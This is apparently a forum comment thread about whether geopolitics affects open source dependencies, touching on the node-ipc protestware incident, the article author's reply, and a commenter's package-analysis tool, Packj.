[bradyd]

I don't really see how this has anything to do with major geopolitical events, other than the fact that the developer of the library is Russian. The author's complaints could have happened with any open source library and don't seem to relate to the war in Ukraine in any way.

[xmprt]

To give a more realistic answer to this question, when I was writing an article about npm dependencies[1], I incidentally came upon a case where the developer of node-ipc released a malicious version of the package that affected computers in Russian and Belarusian IPs specifically in response to the Ukraine war[2].

[1]: https://www.preethamrn.com/posts/who-actually-uses-is-odd

[2]: https://www.bleepingcomputer.com/news/security/big-sabotage-...

[aleksandrh]

And then claimed his GitHub was "hacked" to save his ass. And was somehow not banned by GitHub despite clearly violating their TOS.

[dontupvoteme]

I forgot about that targeted malware for a while, thanks for jogging my memory.

Imagine now if he had done that towards Israelis or Arabs/Palestinians and how both the internet and governments would react.

He only got away with such blatant crime because the entire west was against Russia. Mad that the overton window went so wide for a while there.

[kinow]

I read the article and got the same impression. It had no conclusion on global event affecting dependencies. More speculations rather than facts.

[_5hxt]

Thanks for your comments. I have to admit that it is shallow - going in more detail would risk identification of the people involved and paint a target on my back.

I do realize that he may have simply changed his opinion - yet it is the most controversial one and he stood by it ideologically as expressed numerous times through a variety of mediums.

It's a bit tinfoil hat, but I am disappointed and there's no harm in informing others about these observations and this experience. Mind you - and that's about all I'll add - that the repository stagnated in development for some time, increasing my senses about something being off considerably (browser extension ownership for example get bought frequently by criminals to convert a user base into a cash cow, or worse)

Disclaimer at the end of the article: If I am totally misinterpreting my observations and the Discord hostility without even an attempt at producing counter-arguments or productive and professional openness and communication, at least it serves as a cautionary tale of what could be. In any case, no disrespect or attempt to taint anyone's (opensource) software development ventures and/or their personality is intended. The name of the project or its developers will not be shared, if you can find it, be discrete or this article will be removed. Thank you.

Thanks for your time. Have a great weekend.

[seeknotfind]

As someone off this thread, lol, I hope you have a great weekend too.

Whether it happened or not, it's a reminder of what can happen. Better to learn from mistakes you haven't suffered from so deeply yet. For starters, when in doubt, it doesn't hurt to get rid of the software dependencies you don't need.

For how to know you can trust a dependency, I'm afraid there is no solution: no theorem prover nor isolation, cryptography nor layerizarion can save you.

Though the dead weight loss of mutual distrust weighs on us all, shouts echo in the void, so go home and read code, and when the next day knocks its ugly knuckles, tears at least wet dry watchful eyes.

[ashishbijlani]

> For how to know you can trust a dependency, I'm afraid there is no solution: no theorem prover nor isolation, cryptography nor layerizarion can save you.

I'm taking a stab at addressing this problem with Packj [1]. It carries out static/dynamic/metadata analysis to look for "suspicious” attributes such as spawning of shell, invalid/expired email (i.e., no 2FA), use of files, network communication, use of decode+eval, mismatch of GitHub code vs packaged code, and several more.

1. https://github.com/ossillate-inc/packj